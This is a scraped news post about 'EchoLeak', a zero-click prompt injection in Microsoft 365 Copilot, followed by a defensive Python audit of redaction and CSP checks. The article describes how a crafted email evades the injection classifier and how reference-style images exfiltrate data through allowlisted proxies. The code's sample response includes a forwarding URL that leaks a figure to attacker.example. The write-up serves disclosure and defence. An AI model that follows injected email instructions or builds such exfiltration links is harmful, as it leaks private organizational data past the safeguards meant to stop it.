{"id":4590,"date":"2025-06-12T10:03:58","date_gmt":"2025-06-12T10:03:58","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/06\/12\/0-click-microsoft-365-copilot-vulnerability-let-attackers-exfiltrates-sensitive-data-abusing-teams\/"},"modified":"2025-06-12T10:03:58","modified_gmt":"2025-06-12T10:03:58","slug":"0-click-microsoft-365-copilot-vulnerability-let-attackers-exfiltrates-sensitive-data-abusing-teams","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/06\/12\/0-click-microsoft-365-copilot-vulnerability-let-attackers-exfiltrates-sensitive-data-abusing-teams\/","title":{"rendered":"0-Click Microsoft 365 Copilot Vulnerability Lets Attackers Exfiltrate Sensitive Data Abusing Teams"},"content":{"rendered":"<div>\n<p>A critical zero-click vulnerability in Microsoft 365 Copilot, dubbed \u201cEchoLeak,\u201d enables attackers to automatically exfiltrate sensitive organizational data without requiring any user interaction.<\/p>\n<p>Aim Labs, which reported the flaw, uses it to introduce a class of attack it calls \u201cLLM Scope Violation.\u201d The pattern is not specific to Microsoft\u2019s platform and could affect any AI-powered application that mixes untrusted input with privileged data in the same model context.<\/p>\n<p>The EchoLeak attack exploits design flaws in how <a href=\"https:\/\/cybersecuritynews.com\/m365-copilot-chat-safelinks\/\" target=\"_blank\" rel=\"noreferrer noopener\">M365 Copilot<\/a> retrieves information from organizational data stores and folds it into the prompt it processes.<\/p>\n<p>An external attacker sends a specially crafted email that bypasses several security layers, after which Copilot can be made to extract sensitive information from the victim\u2019s Microsoft Graph data, including emails, <a href=\"https:\/\/cybersecuritynews.com\/microsoft-onedrive-default-sync\/\" target=\"_blank\" rel=\"noreferrer noopener\">OneDrive files<\/a>, SharePoint documents, and Teams conversations.<\/p>\n<p>What makes this attack particularly dangerous is its zero-click nature. Unlike attacks that need the user to click a malicious link or open an infected file, EchoLeak runs entirely in the background.<\/p>\n<p>The attacker only needs to send an email to a target within the organization. The message sits in the mailbox until Copilot retrieves it as context for some routine business request from the victim; at that point the embedded instructions are processed and the exfiltration fires. The victim never has to open the email.<\/p>\n
<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg4r2u_jY7G8c51XvCpUrGjDixQQVcbyp5Mbf-QrW0xW0rxW-SptO0hbFQs8k7mxAmi2Gicxs8pcbktduMa7womCCQvThjDYRmSsP6L24B1-kDdcn7Yhf4h789n_BKeHlXBNF7ooY67iNfGpb95kdEtj9fVeWQ6AbFg0FWdBPmdXr1tc8JrxXdtTSf1Pht2\/s16000\/EchoLeak%25201.webp?ssl=1\" alt=\"Zero-Click Microsoft 365 Copilot Vulnerability\"><figcaption class=\"wp-element-caption\">Zero-Click Microsoft 365 Copilot Vulnerability (<em>Source: Aim Labs<\/em>)<\/figcaption><\/figure>\n<h2 class=\"wp-block-heading\" id=\"technical-sophistication\"><strong>How the EchoLeak Attack Chain Works<\/strong><\/h2>\n<p>The attack chain bypasses four defensive layers that Microsoft placed in front of Copilot: the prompt-injection classifier, link redaction, image redaction, and the Content Security Policy that limits which hosts the Copilot client may fetch from.<\/p>\n<p>First, it circumvents the XPIA (cross-prompt injection attack) classifier by phrasing the malicious instructions as if they were addressed to a human recipient rather than to an AI system, so the text reads like ordinary business correspondence to the classifier.<\/p>\n<p>The researchers <a href=\"https:\/\/www.aim.security\/lp\/aim-labs-echoleak-blogpost\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">also discovered<\/a> multiple bypasses for Microsoft\u2019s link redaction, exploiting lesser-known markdown formatting variations that the security filters do not recognize. Reference-style links and images, where the target URL is defined on a separate line rather than inline, slip past the content scanning. Images matter most here: the client fetches an image URL automatically when the response renders, so an unredacted image carrying data in its URL needs no click from the user.<\/p>\n
<p>Perhaps most concerning is the Content Security Policy (CSP) bypass that makes the exfiltration automatic. CSP only restricts which hosts the Copilot client may request, and the researchers identified <a href=\"https:\/\/cybersecuritynews.com\/microsoft-teams-update-productivity\/\" target=\"_blank\" rel=\"noreferrer noopener\">Microsoft Teams<\/a> and SharePoint endpoints that forward requests to external servers while themselves sitting on the allowed domain list. A request to such an endpoint satisfies the CSP allowlist, and the endpoint relays it, together with any data the attacker placed in the URL, to a server outside the organization.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEg_rV98SgQ8o0T8ZC2dyiXWLqILxCCfOC5G6p-lufcqk3Y454NvOpg-dZEX7l5Ku3V-DBnKA6RyZ10VlJfx_YgnvMABgCh-0qjF5LhiEnApbsyHkPvT1JA5bisDiaVz-W2oKTzFl4yIFIa7Eu127PTbzsaZjyQENgYKal-xItReyWT93Xw9JCL5aGA8tpca\/s16000\/EchoLeak%2520copilot.webp?ssl=1\" alt=\"Zero-Click Microsoft 365 Copilot Vulnerability\"><figcaption class=\"wp-element-caption\">Zero-Click Microsoft 365 Copilot Vulnerability Data Exfiltration (<em>Source: Aim Labs<\/em>)<\/figcaption><\/figure>\n<\/div>\n<p>Aim Labs introduced the term \u201cLLM Scope Violation\u201d for the core mechanism: instructions embedded in untrusted content (here, an external email) direct the AI system to access and process privileged organizational data, and to act on it, without the user ever asking for that data or consenting to its use.<\/p>\n
<p>The researchers argue this violates the Principle of Least Privilege: low-privilege external content gains access to high-privilege internal information through the AI intermediary, because the model treats everything in its context window with the same authority regardless of where it came from.<\/p>\n<p>The discovery highlights the growing security challenges as organizations adopt AI-powered productivity tools. M365 Copilot\u2019s integration with Microsoft Graph gives it broad access to organizational data, which makes it an attractive target.<\/p>\n<p>Microsoft\u2019s MSRC team has been notified of the vulnerability, though details of patches or mitigations have not been disclosed. Aim Labs reports that no customers are known to have been affected to date.<\/p>\n<p>The research shows how threat actors can exploit AI agents through their internal mechanics rather than through the user. As organizations continue deploying <a href=\"https:\/\/cybersecuritynews.com\/ai-powered-tools-are-detecting-and-preventing-cyber-threats\/\" target=\"_blank\" rel=\"noreferrer noopener\">AI-powered tools<\/a>, EchoLeak underscores the need for security controls designed specifically for AI applications, in particular for keeping untrusted input from steering what the model does with privileged data.<\/p>\n<p>The vulnerability\u2019s zero-click nature and potential for data exfiltration make it well suited to corporate espionage and extortion campaigns.<\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/zero-click-microsoft-365-copilot-vulnerability\/\">0-Click Microsoft 365 Copilot Vulnerability Lets Attackers Exfiltrate Sensitive Data Abusing Teams<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p>Guru Baran<\/p>\n","protected":false},"excerpt":{"rendered":"<p>0-Click Microsoft 365 Copilot Vulnerability Lets Attackers Exfiltrate Sensitive Data Abusing Teams A critical zero-click vulnerability in Microsoft 365 Copilot, dubbed \u201cEchoLeak,\u201d enables attackers to automatically exfiltrate sensitive 
organizational data without requiring any user interaction. The vulnerability represents a significant breakthrough in AI security research, introducing a new class of attack called \u201cLLM Scope Violation\u201d [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63],"tags":[130],"class_list":["post-4590","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/4590"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=4590"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/4590\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=4590"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=4590"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=4590"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
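The article above describes three controls the EchoLeak chain gets past (inline-only link redaction, a CSP host allowlist defeated by an allowlisted forwarding endpoint, and the scope violation that puts privileged data into an outbound URL). The following Python is an added example, not code from the article or from Aim Labs, that models those three checks in simplified form so the gaps are concrete. Every hostname, endpoint path, parameter name and the sample response are constructed assumptions and are not the real Copilot, Teams or SharePoint endpoints.

```python
"""Simplified models of link redaction, a CSP host allowlist, and a
scope-violation check (added example; all names below are assumptions)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Inline syntax: [text](url) or ![alt](url)
INLINE = re.compile(r"(!?)\[([^\]]*)\]\(\s*<?([^\s)>]+)>?[^)]*\)")
# Reference use: [text][ref] or [text][] (target defined on another line)
REF_USE = re.compile(r"(!?)\[([^\]]*)\]\s*\[([^\]]*)\]")
# Reference definition on its own line: [ref]: url
REF_DEF = re.compile(r"^[ \t]{0,3}\[([^\]]+)\]:\s*<?(\S+?)>?(?:[ \t]|$)", re.M)

# Assumed CSP img-src allowlist for the client; any other host is blocked.
ALLOWLIST = {"teams.example-tenant.test", "tenant.sharepoint.example.test"}


def extract_links(md: str) -> list[dict]:
    """Every link or image target, whether written inline or reference-style."""
    defs = {key.lower(): url for key, url in REF_DEF.findall(md)}
    found = []
    for bang, _text, url in INLINE.findall(md):
        found.append({"kind": "image" if bang else "link", "style": "inline", "url": url})
    for bang, text, ref in REF_USE.findall(md):
        key = (ref or text).lower()  # [text][] falls back to the text itself
        if key in defs:
            found.append({"kind": "image" if bang else "link", "style": "reference", "url": defs[key]})
    return found


def naive_redact(md: str) -> str:
    """A redactor that only knows inline syntax: keeps the text, drops the URL.
    Reference-style links and images pass through untouched."""
    return INLINE.sub(r"\2", md)


def csp_allows(url: str, allowlist=ALLOWLIST) -> bool:
    """What the client's CSP evaluates: the host of the request, nothing else."""
    host = urlsplit(url).hostname or ""
    return any(host == h or host.endswith("." + h) for h in allowlist)


def smuggled_targets(url: str) -> list[str]:
    """Absolute URLs carried inside the query string (with one extra decode
    level, so a double-encoded target is still seen)."""
    targets = []
    for values in parse_qs(urlsplit(url).query, keep_blank_values=True).values():
        for value in values:
            value = unquote(value)
            if re.match(r"https?://", value):
                targets.append(value)
    return targets


def classify(url: str, allowlist=ALLOWLIST) -> str:
    """blocked: CSP stops the fetch.  allowed: allowlisted host, no external
    target inside.  proxy-exfil: allowlisted host that will forward the request
    (query string included) to a host the CSP never gets to evaluate."""
    if not csp_allows(url, allowlist):
        return "blocked"
    if any(not csp_allows(t, allowlist) for t in smuggled_targets(url)):
        return "proxy-exfil"
    return "allowed"


def carries_context_data(url: str, privileged_snippets: list[str]) -> list[str]:
    """Snippets of privileged context that appear, URL-decoded, in an outbound
    URL: the observable side of a scope violation, where low-trust input has
    steered high-trust data into a request."""
    decoded = unquote(unquote(url)).lower()
    return [s for s in privileged_snippets if s.lower() in decoded]


def audit(md: str) -> list[tuple[str, str, str]]:
    """(kind, style, verdict) for every target that the naive redactor leaves
    in the rendered response."""
    return [(l["kind"], l["style"], classify(l["url"])) for l in extract_links(naive_redact(md))]


# Constructed response: the summary quotes an internal figure, and injected
# instructions got the model to emit a reference-style image whose allowlisted
# forwarding URL carries that figure to an attacker-controlled host.
SAMPLE_RESPONSE = """\
Here is the summary you asked for. Q3 revenue target: 42M.

![status][img]
See the [policy][doc] for details.

[img]: https://teams.example-tenant.test/api/proxy?url=https%3A%2F%2Fattacker.example%2Fc%3Fd%3D42M
[doc]: https://tenant.sharepoint.example.test/sites/hr/policy.docx
"""

if __name__ == "__main__":
    for row in audit(SAMPLE_RESPONSE):
        print(row)
    print(carries_context_data(extract_links(SAMPLE_RESPONSE)[0]["url"], ["42M"]))
```

Running the file reports the image as `proxy-exfil` and the document link as `allowed`, and shows the internal figure inside the image URL. The design point is that a redactor must resolve reference definitions (or render the markdown and inspect the resulting DOM) rather than pattern-match one syntax, a CSP allowlist must exclude endpoints that fetch caller-supplied URLs, and neither of those checks sees the scope violation itself; that needs a comparison between what the response is about to send out and what privileged context went into producing it.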